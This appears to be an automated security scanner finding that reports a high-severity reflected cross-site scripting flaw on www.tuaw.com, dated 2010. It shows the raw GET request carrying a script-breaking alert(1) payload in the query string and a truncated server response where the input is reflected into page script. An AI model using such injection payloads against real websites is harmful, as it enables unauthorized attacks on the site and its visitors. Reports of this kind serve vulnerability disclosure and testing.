1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.tuaw.com |
Path: | / |
GET /?b942f"-alert(1)- Host: www.tuaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:34:49 GMT Server: Apache/2.2 Cache-Control: max-age=60 Keep-Alive: timeout=5, max=999942 Connection: Keep-Alive Content-Type: text/html Content-Length: 90475 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... .server=""; s_265.channel="wb.tuaw"; s_265.pageType=""; s_265.linkInternalFilters s_265.mmxgo = true; s_265.prop1="Tech"; s_265.prop2="Home"; s_265.prop12="http://www s_265.prop16="TUAW -- The Unofficial Apple Weblog"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="ntc"; s_265.prop22="16"; var s_code=s_265.t();if(s ...[SNIP]... |